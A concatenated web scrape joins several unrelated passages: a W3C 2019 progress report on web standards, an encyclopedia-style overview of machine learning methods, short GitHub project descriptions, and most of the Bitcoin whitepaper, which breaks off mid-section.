end. The specification enables synthesizing audio in the browser. Audio operations are performed with audio nodes, which are linked together to form a modular audio routing graph. Multiple sources — with different types of channel layout — are supported. This modular design provides the flexibility to create complex audio functions with dynamic effects. The first version of Web Audio API is now feature complete and is implemented in all modern browsers. Work has started on the next version, and new features are being incubated in the Audio Community Group. Performance Web Performance All Web Performance specifications There are currently 18 specifications in development in the Web Performance Working Group aiming to provide methods to observe and improve aspects of application performance of user agent features and APIs. The W3C team is looking at related work incubated in the W3C GPU for the Web (WebGPU) Community Group which is poised to transition to a W3C Working Group. A preliminary draft charter is available. WebAssembly All WebAssembly specifications WebAssembly improves Web performance and power by being a virtual machine and execution environment enabling loaded pages to run native (compiled) code. It is deployed in Firefox, Edge, Safari and Chrome. The specification will soon reach Candidate Recommendation. WebAssembly enables near-native performance, optimized load time, and perhaps most importantly, a compilation target for existing code bases. While it has a small number of native types, much of the performance increase relative to Javascript derives from its use of consistent typing. WebAssembly leverages decades of optimization for compiled languages and the byte code is optimized for compactness and streaming (the web page starts executing while the rest of the code downloads). Network and API access all occurs through accompanying Javascript libraries -- the security model is identical to that of Javascript. Requirements gathering and language development occur in the Community Group while the Working Group manages test development, community review and progression of specifications on the Recommendation Track. Testing Browser testing plays a critical role in the growth of the Web by: Improving the reliability of Web technology definitions; Improving the quality of implementations of these technologies by helping vendors to detect bugs in their products; Improving the data available to Web developers on known bugs and deficiencies of Web technologies by publishing results of these tests. Browser Testing and Tools The Browser Testing and Tools Working Group is developing WebDriver version 2, having published last year the W3C Recommendation of WebDriver. WebDriver acts as a remote control interface that enables introspection and control of user agents, provides a platform- and language-neutral wire protocol as a way for out-of-process programs to remotely instruct the behavior of Web, and emulates the actions of a real person using the browser. WebPlatform Tests The WebPlatform Tests project now provides a mechanism which allows to fully automate tests that previously needed to be run manually: TestDriver. TestDriver enables sending trusted key and mouse events, sending complex series of trusted pointer and key interactions for things like in-content drag-and-drop or pinch zoom, and even file upload. Since 2014 W3C began work on this coordinated open-source effort to build a cross-browser test suite for the Web Platform, which WHATWG, and all major browsers adopted. Web of Data All Data specifications There have been several great success stories around the standardization of data on the web over the past year. Verifiable Claims seems to have significant uptake. It is also significant that the Distributed Identifier WG charter has received numerous favorable reviews, and was just recently launched. JSON-LD has been a major success with the large deployment on Web sites via schema.org. JSON-LD 1.1 completed technical work, about to transition to CR More than 25% of websites today include schema.org data in JSON-LD The Web of Things description is in CR since May, making use of JSON-LD Verifiable Credentials data model is in CR since July, also making use of JSON-LD Continued strong interest in decentralized identifiers Engagement from the TAG with reframing core documents, such as Ethical Web Principles, to include data on the web within their scope Data is increasingly important for all organizations, especially with the rise of IoT and Big Data. W3C has a mature and extensive suite of standards relating to data that were developed over two decades of experience, with plans for further work on making it easier for developers to work with graph data and knowledge graphs. Linked Data is about the use of URIs as names for things, the ability to dereference these URIs to get further information and to include links to other data. There are ever-increasing sources of open Linked Data on the Web, as well as data services that are restricted to the suppliers and consumers of those services. The digital transformation of industry is seeking to exploit advanced digital technologies. This will facilitate businesses to integrate horizontally along the supply and value chains, and vertically from the factory floor to the office floor. W3C is seeking to make it easier to support enterprise-wide data management and governance, reflecting the strategic importance of data to modern businesses. Traditional approaches to data have focused on tabular databases (SQL/RDBMS), Comma Separated Value (CSV) files, and data embedded in PDF documents and spreadsheets. We're now in midst of a major shift to graph data with nodes and labeled directed links between them. Graph data is: Faster than using SQL and associated JOIN operations More favorable to integrating data from heterogeneous sources Better suited to situations where the data model is evolving In the wake of the recent W3C Workshop on Graph Data we are in the process of launching a Graph Standardization Business Group to provide a business perspective with use cases and requirements, to coordinate technical standards work and liaisons with external organizations. Web for All Security, Privacy, Identity All Security specifications, all Privacy specifications Authentication on the Web As the WebAuthn Level 1 W3C Recommendation published last March is seeing wide implementation and adoption of strong cryptographic authentication, work is proceeding on Level 2. The open standard Web API gives native authentication technology built into native platforms, browsers, operating systems (including mobile) and hardware, offering protection against hacking, credential theft, phishing attacks, thus aiming to end the era of passwords as a security construct. You may read more in our March press release. Privacy An increasing number of W3C specifications are benefitting from Privacy and Security review; there are security and privacy aspects to every specification. Early review is essential. Working with the TAG, the Privacy Interest Group has updated the Self-Review Questionnaire: Security and Privacy. Other recent work of the group includes public blogging further to the exploration of anti-patterns in standards and permission prompts. Security The Web Application Security Working Group adopted Feature Policy, aiming to allow developers to selectively enable, disable, or modify the behavior of some of these browser features and APIs within their application; and Fetch Metadata, aiming to provide servers with enough information to make a priori decisions about whether or not to service a request based on the way it was made, and the context in which it will be used. The Web Payment Security Interest Group, launched last April, convenes members from W3C, EMVCo, and the FIDO Alliance to discuss cooperative work to enhance the security and interoperability of Web payments (read more about payments). Internationalization (i18n) All Internationalization specifications, educational articles related to Internationalization, spec developers checklist Only a quarter or so current Web users use English online and that proportion will continue to decrease as the Web reaches more and more communities of limited English proficiency. If the Web is to live up to the "World Wide" portion of its name, and for the Web to truly work for stakeholders all around the world engaging with content in various languages, it must support the needs of worldwide users as they engage with content in the various languages. The growth of epublishing also brings requirements for new features and improved typography on the Web. It is important to ensure the needs of local communities are captured. The W3C Internationalization Initiative was set up to increase in-house resources dedicated to accelerating progress in making the World Wide Web "worldwide" by gathering user requirements, supporting developers, and education & outreach. For an overview of current projects see the i18n radar. W3C's Internationalization efforts progressed on a number of fronts recently: Requirements: New African and European language groups will work on the gap analysis, errata and layout requirements. Gap analysis: Japanese, Devanagari, Bengali, Tamil, Lao, Khmer, Javanese, and Ethiopic updated in the gap-analysis documents. Layout requirements document: notable progress tracked in the Southeast Asian Task Force while work continues on Chinese layout requirements. Developer support: Spec reviews: the i18n WG continues active review of specifications of the WHATWG and other W3C Working Groups. Short review checklist: easy way to begin a self-review to help spec developers understand what aspects of their spec are likely to need attention for internationalization, and points them to more detailed checklists for the relevant topics. It also helps those reviewing specs for i18n issues. Strings on the Web: Language and Direction Metadata lays out issues and discusses potential solutions for passing information about language and direction with strings in JSON or other data formats. The document was rewritten for clarity, and expanded. The group is collaborating with the JSON-LD and Web Publishing groups to develop a plan for updating RDF, JSON-LD and related specifications to handle metadata for base direction of text (bidi). User-friendly test format: a new format was developed for Internationalization Test Suite tests, which displays helpful information about how the test works. This particularly useful because those tests are pointed to by educational materials and gap-analysis documents. Web Platform Tests: a large number of tests in the i18n test suite have been ported to the WPT repository, including: css-counter-styles, css-ruby, css-syntax, css-test, css-text-decor, css-writing-modes, and css-pseudo. Education & outreach: (for all educational materials, see the HTML & CSS Authoring Techniques) Web Accessibility All Accessibility specifications, WAI resources The Web Accessibility Initiative supports W3C's Web for All mission. Recent achievements include: Education and training: Inaccessibility of CAPTCHA updated to bring our analysis and recommendations up to date with CAPTCHA practice today, concluding two years of extensive work and invaluable input from the public (read more on the W3C Blog Learn why your web content and applications should be accessible. The Education and Outreach Working Group has completed revision and updating of the Business Case for Digital Accessibility. Accessibility guidelines: The Accessibility Guidelines Working Group has continued to update WCAG Techniques and Understanding WCAG 2.1; and published a Candidate Recommendation of Accessibility Conformance Testing Rules Format 1.0 to improve inter-rater reliability when evaluating conformance of web content to WCAG An updated charter is being developed to host work on "Silver", the next generation accessibility guidelines (WCAG 2.2) There are accessibility aspects to most specifications. Check your work with the FAST checklist. Outreach to the world W3C Developer Relations To foster the excellent feedback loop between Web Standards development and Web developers, and to grow participation from that diverse community, recent W3C Developer Relations activities include: @w3cdevs tracks the enormous amount of work happening across W3C W3C Track during the Web Conference 2019 in San Francisco Tech videos: W3C published the 2019 Web Games Workshop videos The 16 September 2019 Developer Meetup in Fukuoka, Japan, is open to all and will combine a set of technical demos prepared by W3C groups, and a series of talks on a selected set of W3C technologies and projects W3C is involved with Mozilla, Google, Samsung, Microsoft and Bocoup in the organization of ViewSource 2019 in Amsterdam (read more on the W3C Blog) W3C Training In partnership with EdX, W3C's MOOC training program, W3Cx offers a complete "Front-End Web Developer" (FEWD) professional certificate program that consists of a suite of five courses on the foundational languages that power the Web: HTML5, CSS and JavaScript. We count nearly 900K students from all over the world. Translations Many Web users rely on translations of documents developed at W3C whose official language is English. W3C is extremely grateful to the continuous efforts of its community in ensuring our various deliverables in general, and in our specifications in particular, are made available in other languages, for free, ensuring their exposure to a much more diverse set of readers. Last Spring we developed a more robust system, a new listing of translations of W3C specifications and updated the instructions on how to contribute to our translation efforts. W3C Liaisons Liaisons and coordination with numerous organizations and Standards Development Organizations (SDOs) is crucial for W3C to: make sure standards are interoperable coordinate our respective agenda in Internet governance: W3C participates in ICANN, GIPO, IGF, the I* organizations (ICANN, IETF, ISOC, IAB). ensure at the government liaison level that our standards work is officially recognized when important to our membership so that products based on them (often done by our members) are part of procurement orders. W3C has ARO/PAS status with ISO. W3C participates in the EU MSP and Rolling Plan on Standardization ensure the global set of Web and Internet standards form a compatible stack of technologies, at the technical and policy level (patent regime, fragmentation, use in policy making) promote Standards adoption equally by the industry, the public sector, and the public at large Coralie Mercier, Editor, W3C Marketing & Communications $Id: Overview.html,v 1.60 2019/10/15 12:05:52 coralie Exp $ Copyright © 2019 W3C ® (MIT, ERCIM, Keio, Beihang) Usage policies apply.
Aryia-Behroziuan / NeuronsAn ANN is a model based on a collection of connected units or nodes called "artificial neurons", which loosely model the neurons in a biological brain. Each connection, like the synapses in a biological brain, can transmit information, a "signal", from one artificial neuron to another. An artificial neuron that receives a signal can process it and then signal additional artificial neurons connected to it. In common ANN implementations, the signal at a connection between artificial neurons is a real number, and the output of each artificial neuron is computed by some non-linear function of the sum of its inputs. The connections between artificial neurons are called "edges". Artificial neurons and edges typically have a weight that adjusts as learning proceeds. The weight increases or decreases the strength of the signal at a connection. Artificial neurons may have a threshold such that the signal is only sent if the aggregate signal crosses that threshold. Typically, artificial neurons are aggregated into layers. Different layers may perform different kinds of transformations on their inputs. Signals travel from the first layer (the input layer) to the last layer (the output layer), possibly after traversing the layers multiple times. The original goal of the ANN approach was to solve problems in the same way that a human brain would. However, over time, attention moved to performing specific tasks, leading to deviations from biology. Artificial neural networks have been used on a variety of tasks, including computer vision, speech recognition, machine translation, social network filtering, playing board and video games and medical diagnosis. Deep learning consists of multiple hidden layers in an artificial neural network. This approach tries to model the way the human brain processes light and sound into vision and hearing. Some successful applications of deep learning are computer vision and speech recognition.[68] Decision trees Main article: Decision tree learning Decision tree learning uses a decision tree as a predictive model to go from observations about an item (represented in the branches) to conclusions about the item's target value (represented in the leaves). It is one of the predictive modeling approaches used in statistics, data mining, and machine learning. Tree models where the target variable can take a discrete set of values are called classification trees; in these tree structures, leaves represent class labels and branches represent conjunctions of features that lead to those class labels. Decision trees where the target variable can take continuous values (typically real numbers) are called regression trees. In decision analysis, a decision tree can be used to visually and explicitly represent decisions and decision making. In data mining, a decision tree describes data, but the resulting classification tree can be an input for decision making. Support vector machines Main article: Support vector machines Support vector machines (SVMs), also known as support vector networks, are a set of related supervised learning methods used for classification and regression. Given a set of training examples, each marked as belonging to one of two categories, an SVM training algorithm builds a model that predicts whether a new example falls into one category or the other.[69] An SVM training algorithm is a non-probabilistic, binary, linear classifier, although methods such as Platt scaling exist to use SVM in a probabilistic classification setting. In addition to performing linear classification, SVMs can efficiently perform a non-linear classification using what is called the kernel trick, implicitly mapping their inputs into high-dimensional feature spaces. Illustration of linear regression on a data set. Regression analysis Main article: Regression analysis Regression analysis encompasses a large variety of statistical methods to estimate the relationship between input variables and their associated features. Its most common form is linear regression, where a single line is drawn to best fit the given data according to a mathematical criterion such as ordinary least squares. The latter is often extended by regularization (mathematics) methods to mitigate overfitting and bias, as in ridge regression. When dealing with non-linear problems, go-to models include polynomial regression (for example, used for trendline fitting in Microsoft Excel[70]), logistic regression (often used in statistical classification) or even kernel regression, which introduces non-linearity by taking advantage of the kernel trick to implicitly map input variables to higher-dimensional space. Bayesian networks Main article: Bayesian network A simple Bayesian network. Rain influences whether the sprinkler is activated, and both rain and the sprinkler influence whether the grass is wet. A Bayesian network, belief network, or directed acyclic graphical model is a probabilistic graphical model that represents a set of random variables and their conditional independence with a directed acyclic graph (DAG). For example, a Bayesian network could represent the probabilistic relationships between diseases and symptoms. Given symptoms, the network can be used to compute the probabilities of the presence of various diseases. Efficient algorithms exist that perform inference and learning. Bayesian networks that model sequences of variables, like speech signals or protein sequences, are called dynamic Bayesian networks. Generalizations of Bayesian networks that can represent and solve decision problems under uncertainty are called influence diagrams. Genetic algorithms Main article: Genetic algorithm A genetic algorithm (GA) is a search algorithm and heuristic technique that mimics the process of natural selection, using methods such as mutation and crossover to generate new genotypes in the hope of finding good solutions to a given problem. In machine learning, genetic algorithms were used in the 1980s and 1990s.[71][72] Conversely, machine learning techniques have been used to improve the performance of genetic and evolutionary algorithms.[73] Training models Usually, machine learning models require a lot of data in order for them to perform well. Usually, when training a machine learning model, one needs to collect a large, representative sample of data from a training set. Data from the training set can be as varied as a corpus of text, a collection of images, and data collected from individual users of a service. Overfitting is something to watch out for when training a machine learning model. Federated learning Main article: Federated learning Federated learning is an adapted form of distributed artificial intelligence to training machine learning models that decentralizes the training process, allowing for users' privacy to be maintained by not needing to send their data to a centralized server. This also increases efficiency by decentralizing the training process to many devices. For example, Gboard uses federated machine learning to train search query prediction models on users' mobile phones without having to send individual searches back to Google.[74] Applications There are many applications for machine learning, including: Agriculture Anatomy Adaptive websites Affective computing Banking Bioinformatics Brain–machine interfaces Cheminformatics Citizen science Computer networks Computer vision Credit-card fraud detection Data quality DNA sequence classification Economics Financial market analysis[75] General game playing Handwriting recognition Information retrieval Insurance Internet fraud detection Linguistics Machine learning control Machine perception Machine translation Marketing Medical diagnosis Natural language processing Natural language understanding Online advertising Optimization Recommender systems Robot locomotion Search engines Sentiment analysis Sequence mining Software engineering Speech recognition Structural health monitoring Syntactic pattern recognition Telecommunication Theorem proving Time series forecasting User behavior analytics In 2006, the media-services provider Netflix held the first "Netflix Prize" competition to find a program to better predict user preferences and improve the accuracy of its existing Cinematch movie recommendation algorithm by at least 10%. A joint team made up of researchers from AT&T Labs-Research in collaboration with the teams Big Chaos and Pragmatic Theory built an ensemble model to win the Grand Prize in 2009 for $1 million.[76] Shortly after the prize was awarded, Netflix realized that viewers' ratings were not the best indicators of their viewing patterns ("everything is a recommendation") and they changed their recommendation engine accordingly.[77] In 2010 The Wall Street Journal wrote about the firm Rebellion Research and their use of machine learning to predict the financial crisis.[78] In 2012, co-founder of Sun Microsystems, Vinod Khosla, predicted that 80% of medical doctors' jobs would be lost in the next two decades to automated machine learning medical diagnostic software.[79] In 2014, it was reported that a machine learning algorithm had been applied in the field of art history to study fine art paintings and that it may have revealed previously unrecognized influences among artists.[80] In 2019 Springer Nature published the first research book created using machine learning.[81] Limitations Although machine learning has been transformative in some fields, machine-learning programs often fail to deliver expected results.[82][83][84] Reasons for this are numerous: lack of (suitable) data, lack of access to the data, data bias, privacy problems, badly chosen tasks and algorithms, wrong tools and people, lack of resources, and evaluation problems.[85] In 2018, a self-driving car from Uber failed to detect a pedestrian, who was killed after a collision.[86] Attempts to use machine learning in healthcare with the IBM Watson system failed to deliver even after years of time and billions of dollars invested.[87][88] Bias Main article: Algorithmic bias Machine learning approaches in particular can suffer from different data biases. A machine learning system trained on current customers only may not be able to predict the needs of new customer groups that are not represented in the training data. When trained on man-made data, machine learning is likely to pick up the same constitutional and unconscious biases already present in society.[89] Language models learned from data have been shown to contain human-like biases.[90][91] Machine learning systems used for criminal risk assessment have been found to be biased against black people.[92][93] In 2015, Google photos would often tag black people as gorillas,[94] and in 2018 this still was not well resolved, but Google reportedly was still using the workaround to remove all gorillas from the training data, and thus was not able to recognize real gorillas at all.[95] Similar issues with recognizing non-white people have been found in many other systems.[96] In 2016, Microsoft tested a chatbot that learned from Twitter, and it quickly picked up racist and sexist language.[97] Because of such challenges, the effective use of machine learning may take longer to be adopted in other domains.[98] Concern for fairness in machine learning, that is, reducing bias in machine learning and propelling its use for human good is increasingly expressed by artificial intelligence scientists, including Fei-Fei Li, who reminds engineers that "There’s nothing artificial about AI...It’s inspired by people, it’s created by people, and—most importantly—it impacts people. It is a powerful tool we are only just beginning to understand, and that is a profound responsibility.”[99] Model assessments Classification of machine learning models can be validated by accuracy estimation techniques like the holdout method, which splits the data in a training and test set (conventionally 2/3 training set and 1/3 test set designation) and evaluates the performance of the training model on the test set. In comparison, the K-fold-cross-validation method randomly partitions the data into K subsets and then K experiments are performed each respectively considering 1 subset for evaluation and the remaining K-1 subsets for training the model. In addition to the holdout and cross-validation methods, bootstrap, which samples n instances with replacement from the dataset, can be used to assess model accuracy.[100] In addition to overall accuracy, investigators frequently report sensitivity and specificity meaning True Positive Rate (TPR) and True Negative Rate (TNR) respectively. Similarly, investigators sometimes report the false positive rate (FPR) as well as the false negative rate (FNR). However, these rates are ratios that fail to reveal their numerators and denominators. The total operating characteristic (TOC) is an effective method to express a model's diagnostic ability. TOC shows the numerators and denominators of the previously mentioned rates, thus TOC provides more information than the commonly used receiver operating characteristic (ROC) and ROC's associated area under the curve (AUC).[101] Ethics Machine learning poses a host of ethical questions. Systems which are trained on datasets collected with biases may exhibit these biases upon use (algorithmic bias), thus digitizing cultural prejudices.[102] For example, using job hiring data from a firm with racist hiring policies may lead to a machine learning system duplicating the bias by scoring job applicants against similarity to previous successful applicants.[103][104] Responsible collection of data and documentation of algorithmic rules used by a system thus is a critical part of machine learning. Because human languages contain biases, machines trained on language corpora will necessarily also learn these biases.[105][106] Other forms of ethical challenges, not related to personal biases, are more seen in health care. There are concerns among health care professionals that these systems might not be designed in the public's interest but as income-generating machines. This is especially true in the United States where there is a long-standing ethical dilemma of improving health care, but also increasing profits. For example, the algorithms could be designed to provide patients with unnecessary tests or medication in which the algorithm's proprietary owners hold stakes. There is huge potential for machine learning in health care to provide professionals a great tool to diagnose, medicate, and even plan recovery paths for patients, but this will not happen until the personal biases mentioned previously, and these "greed" biases are addressed.[107] Hardware Since the 2010s, advances in both machine learning algorithms and computer hardware have led to more efficient methods for training deep neural networks (a particular narrow subdomain of machine learning) that contain many layers of non-linear hidden units.[108] By 2019, graphic processing units (GPUs), often with AI-specific enhancements, had displaced CPUs as the dominant method of training large-scale commercial cloud AI.[109] OpenAI estimated the hardware compute used in the largest deep learning projects from AlexNet (2012) to AlphaZero (2017), and found a 300,000-fold increase in the amount of compute required, with a doubling-time trendline of 3.4 months.[110][111] Software Software suites containing a variety of machine learning algorithms include the following: Free and open-source so
SHITIANYU-hue / Efficient Motion PlanningTo guarantee safe and efficient driving for automated vehicles in complicated traffic conditions, the motion planning module of automated vehicles are expected to generate collision-free driving policies as soon as possible in varying traffic environment. However, there always exist a tradeoff between efficiency and accuracy for the motion planning algorithms. Besides, most motion planning methods cannot find the desired trajectory under extreme scenarios (e.g., lane change in crowded traffic scenarios). This study proposed an efficient motion planning strategy for automated lane change based on Mixed-Integer Quadratic Optimization (MIQP) and Neural Networks. We modeled the lane change task as a mixed-integer quadratic optimization problem with logical constraints, which allows the planning module to generate feasible, safe and comfortable driving actions for lane changing process. Then, a hierarchical machine learning structure that consists of SVM-based classification layer and NN-based action learning layer is established to generate desired driving policies that can make online, fast and generalized motion planning. Our model is validated in crowded lane change scenarios through numerical simulations and results indicate that our model can provide optimal and efficient motion planning for automated vehicles
Paulescu / Real Time Technical IndicatorsLearn to build a modular real-time feature pipeline, so you avoid Offline-Online Feature Skew, and your deployed ML models work as expected.
Ashishsinha10 / Stock Market Analysis Using Python Numpy PandasThe aim of the project was to extract information about various technology stocks mainly - Google, Apple, Microsoft and Amazon from the online stock trading sites - Yahoo Finance and to visualize different aspects of the stocks like the Adjusted Closing Prices, Volumes of stocks traded on a particular day, moving averages of the closing price-to get a basic idea of which way the price is moving by cutting down noise from the data and the daily returns on the stocks. Correlation plots were created for the daily percentage return and Closing prices of the stocks to check how correlated two stocks are. It was obvious that all technology stocks are positively correlated but few like Amazon and Microsoft were highly correlated with each other. The information gathered on daily percentage returns was further used for Risk Analysis by calculating the Expected Return (Average / mean return of the stock) and standard deviation (measurement of Risk -> Greater the std. dev. greater is the risk and vice versa). A scatter plot was created for comparing the Expected return of stocks to its risk. This helped in visualizing the risk factor of various stocks (stocks with high standard deviation and low return).
Safayet-Shawn / Ecommerce WebsiteEcommerce Website People can buy different types of online product using this website. Customer:: A costomer will land in our front page first and can see some of our product .Then by clicking shop in nav bar they will get different types of product category and they can find their expected product easily from there.After reaching in a spacific product category page a customer will get the option to view a product's single page or add to cart by simply hover over on a product .In single page customer will be able to set the quantity of this product or simply add this product to his wishlist .Here anyone is able to add a review for this product just for once but for that he have to login first otherwise he can just see other review. Here a customer is free to add different types of product in different quantity.In cart page a customer will see details of his ongoing shopping and if that customer feels like he dome he can click on chechout which will redirect him to login,register page.After login he will be redirected to Checkout page and there he have to full fill the billing details if he is shopping here for the first time otherwise his billing details will de displayed and he can edit if wants. Only cash on delivery payment method is available now ,after clicking paynow the customer will be redirected into his 'My Account' page.There he is able see all his info in a nice way , also view or cancel all his order.For cancelling any order castomer have to show a cause. Admin:: This [Domain/admin] will redirect into admin login page.After loggin he is able careate ,view ,update and delete, category and product.In Order page he can view all the orders details and he can process the oder among(in proceess/Dispatch/Delivered) by showing a cause .If admin wants to logout ,he can do it simply by hover over my account and there he will get logout option.Category,Product,Order ,My Account all of this will be displaied in navbar and each of this consists of different subsection in dropdown. Language:: Design:I have used a html Template Development: Php ,Mysqli
uvhw / Bitcoin FoundationBitcoin: A Peer-to-Peer Electronic Cash System Satoshi Nakamoto satoshin@gmx.com www.bitcoin.org Abstract. A purely peer-to-peer version of electronic cash would allow online payments to be sent directly from one party to another without going through a financial institution. Digital signatures provide part of the solution, but the main benefits are lost if a trusted third party is still required to prevent double-spending. We propose a solution to the double-spending problem using a peer-to-peer network. The network timestamps transactions by hashing them into an ongoing chain of hash-based proof-of-work, forming a record that cannot be changed without redoing the proof-of-work. The longest chain not only serves as proof of the sequence of events witnessed, but proof that it came from the largest pool of CPU power. As long as a majority of CPU power is controlled by nodes that are not cooperating to attack the network, they'll generate the longest chain and outpace attackers. The network itself requires minimal structure. Messages are broadcast on a best effort basis, and nodes can leave and rejoin the network at will, accepting the longest proof-of-work chain as proof of what happened while they were gone. 1. Introduction Commerce on the Internet has come to rely almost exclusively on financial institutions serving as trusted third parties to process electronic payments. While the system works well enough for most transactions, it still suffers from the inherent weaknesses of the trust based model. Completely non-reversible transactions are not really possible, since financial institutions cannot avoid mediating disputes. The cost of mediation increases transaction costs, limiting the minimum practical transaction size and cutting off the possibility for small casual transactions, and there is a broader cost in the loss of ability to make non-reversible payments for non- reversible services. With the possibility of reversal, the need for trust spreads. Merchants must be wary of their customers, hassling them for more information than they would otherwise need. A certain percentage of fraud is accepted as unavoidable. These costs and payment uncertainties can be avoided in person by using physical currency, but no mechanism exists to make payments over a communications channel without a trusted party. What is needed is an electronic payment system based on cryptographic proof instead of trust, allowing any two willing parties to transact directly with each other without the need for a trusted third party. Transactions that are computationally impractical to reverse would protect sellers from fraud, and routine escrow mechanisms could easily be implemented to protect buyers. In this paper, we propose a solution to the double-spending problem using a peer-to-peer distributed timestamp server to generate computational proof of the chronological order of transactions. The system is secure as long as honest nodes collectively control more CPU power than any cooperating group of attacker nodes. 1 2. Transactions We define an electronic coin as a chain of digital signatures. Each owner transfers the coin to the next by digitally signing a hash of the previous transaction and the public key of the next owner and adding these to the end of the coin. A payee can verify the signatures to verify the chain of ownership. Transaction Hash Transaction Hash Transaction Hash Owner 1's Public Key Owner 2's Public Key Owner 3's Public Key Owner 0's Signature Owner 1's Signature The problem of course is the payee can't verify that one of the owners did not double-spend the coin. A common solution is to introduce a trusted central authority, or mint, that checks every transaction for double spending. After each transaction, the coin must be returned to the mint to issue a new coin, and only coins issued directly from the mint are trusted not to be double-spent. The problem with this solution is that the fate of the entire money system depends on the company running the mint, with every transaction having to go through them, just like a bank. We need a way for the payee to know that the previous owners did not sign any earlier transactions. For our purposes, the earliest transaction is the one that counts, so we don't care about later attempts to double-spend. The only way to confirm the absence of a transaction is to be aware of all transactions. In the mint based model, the mint was aware of all transactions and decided which arrived first. To accomplish this without a trusted party, transactions must be publicly announced [1], and we need a system for participants to agree on a single history of the order in which they were received. The payee needs proof that at the time of each transaction, the majority of nodes agreed it was the first received. 3. Timestamp Server The solution we propose begins with a timestamp server. A timestamp server works by taking a hash of a block of items to be timestamped and widely publishing the hash, such as in a newspaper or Usenet post [2-5]. The timestamp proves that the data must have existed at the time, obviously, in order to get into the hash. Each timestamp includes the previous timestamp in its hash, forming a chain, with each additional timestamp reinforcing the ones before it. Hash Hash Owner 2's Signature Owner 1's Private Key Owner 2's Private Key Owner 3's Private Key Block Item Item ... 2 Block Item Item ... Verify Verify Sign Sign 4. Proof-of-Work To implement a distributed timestamp server on a peer-to-peer basis, we will need to use a proof- of-work system similar to Adam Back's Hashcash [6], rather than newspaper or Usenet posts. The proof-of-work involves scanning for a value that when hashed, such as with SHA-256, the hash begins with a number of zero bits. The average work required is exponential in the number of zero bits required and can be verified by executing a single hash. For our timestamp network, we implement the proof-of-work by incrementing a nonce in the block until a value is found that gives the block's hash the required zero bits. Once the CPU effort has been expended to make it satisfy the proof-of-work, the block cannot be changed without redoing the work. As later blocks are chained after it, the work to change the block would include redoing all the blocks after it. The proof-of-work also solves the problem of determining representation in majority decision making. If the majority were based on one-IP-address-one-vote, it could be subverted by anyone able to allocate many IPs. Proof-of-work is essentially one-CPU-one-vote. The majority decision is represented by the longest chain, which has the greatest proof-of-work effort invested in it. If a majority of CPU power is controlled by honest nodes, the honest chain will grow the fastest and outpace any competing chains. To modify a past block, an attacker would have to redo the proof-of-work of the block and all blocks after it and then catch up with and surpass the work of the honest nodes. We will show later that the probability of a slower attacker catching up diminishes exponentially as subsequent blocks are added. To compensate for increasing hardware speed and varying interest in running nodes over time, the proof-of-work difficulty is determined by a moving average targeting an average number of blocks per hour. If they're generated too fast, the difficulty increases. 5. Network The steps to run the network are as follows: 1) New transactions are broadcast to all nodes. 2) Each node collects new transactions into a block. 3) Each node works on finding a difficult proof-of-work for its block. 4) When a node finds a proof-of-work, it broadcasts the block to all nodes. 5) Nodes accept the block only if all transactions in it are valid and not already spent. 6) Nodes express their acceptance of the block by working on creating the next block in the chain, using the hash of the accepted block as the previous hash. Nodes always consider the longest chain to be the correct one and will keep working on extending it. If two nodes broadcast different versions of the next block simultaneously, some nodes may receive one or the other first. In that case, they work on the first one they received, but save the other branch in case it becomes longer. The tie will be broken when the next proof- of-work is found and one branch becomes longer; the nodes that were working on the other branch will then switch to the longer one. 3 Block Nonce Tx Tx ... Block Nonce Tx Tx ... Prev Hash Prev Hash New transaction broadcasts do not necessarily need to reach all nodes. As long as they reach many nodes, they will get into a block before long. Block broadcasts are also tolerant of dropped messages. If a node does not receive a block, it will request it when it receives the next block and realizes it missed one. 6. Incentive By convention, the first transaction in a block is a special transaction that starts a new coin owned by the creator of the block. This adds an incentive for nodes to support the network, and provides a way to initially distribute coins into circulation, since there is no central authority to issue them. The steady addition of a constant of amount of new coins is analogous to gold miners expending resources to add gold to circulation. In our case, it is CPU time and electricity that is expended. The incentive can also be funded with transaction fees. If the output value of a transaction is less than its input value, the difference is a transaction fee that is added to the incentive value of the block containing the transaction. Once a predetermined number of coins have entered circulation, the incentive can transition entirely to transaction fees and be completely inflation free. The incentive may help encourage nodes to stay honest. If a greedy attacker is able to assemble more CPU power than all the honest nodes, he would have to choose between using it to defraud people by stealing back his payments, or using it to generate new coins. He ought to find it more profitable to play by the rules, such rules that favour him with more new coins than everyone else combined, than to undermine the system and the validity of his own wealth. 7. Reclaiming Disk Space Once the latest transaction in a coin is buried under enough blocks, the spent transactions before it can be discarded to save disk space. To facilitate this without breaking the block's hash, transactions are hashed in a Merkle Tree [7][2][5], with only the root included in the block's hash. Old blocks can then be compacted by stubbing off branches of the tree. The interior hashes do not need to be stored. Block Hash0 Hash1 Hash2 Hash3 Tx0 Tx1 Tx2 Tx3 Block Header (Block Hash) Prev Hash Nonce Root Hash Hash01 Hash23 Block Block Header (Block Hash) Prev Hash Nonce Root Hash Hash01 Hash23 Hash2 Hash3 Tx3 Transactions Hashed in a Merkle Tree After Pruning Tx0-2 from the Block A block header with no transactions would be about 80 bytes. If we suppose blocks are generated every 10 minutes, 80 bytes * 6 * 24 * 365 = 4.2MB per year. With computer systems typically selling with 2GB of RAM as of 2008, and Moore's Law predicting current growth of 1.2GB per year, storage should not be a problem even if the block headers must be kept in memory. 4 8. Simplified Payment Verification It is possible to verify payments without running a full network node. A user only needs to keep a copy of the block headers of the longest proof-of-work chain, which he can get by querying network nodes until he's convinced he has the longest chain, and obtain the Merkle branch linking the transaction to the block it's timestamped in. He can't check the transaction for himself, but by linking it to a place in the chain, he can see that a network node has accepted it, and blocks added after it further confirm the network has accepted it. Longest Proof-of-Work Chain Block Header Block Header Block Header Prev Hash Nonce Prev Hash Nonce Prev Hash Nonce Merkle Root Merkle Root Merkle Root Hash01 Hash23 Merkle Branch for Tx3 Hash2 Hash3 Tx3 As such, the verification is reliable as long as honest nodes control the network, but is more vulnerable if the network is overpowered by an attacker. While network nodes can verify transactions for themselves, the simplified method can be fooled by an attacker's fabricated transactions for as long as the attacker can continue to overpower the network. One strategy to protect against this would be to accept alerts from network nodes when they detect an invalid block, prompting the user's software to download the full block and alerted transactions to confirm the inconsistency. Businesses that receive frequent payments will probably still want to run their own nodes for more independent security and quicker verification. 9. Combining and Splitting Value Although it would be possible to handle coins individually, it would be unwieldy to make a separate transaction for every cent in a transfer. To allow value to be split and combined, transactions contain multiple inputs and outputs. Normally there will be either a single input from a larger previous transaction or multiple inputs combining smaller amounts, and at most two outputs: one for the payment, and one returning the change, if any, back to the sender. It should be noted that fan-out, where a transaction depends on several transactions, and those transactions depend on many more, is not a problem here. There is never the need to extract a complete standalone copy of a transaction's history. 5 Transaction In Out In ... ... 10. Privacy The traditional banking 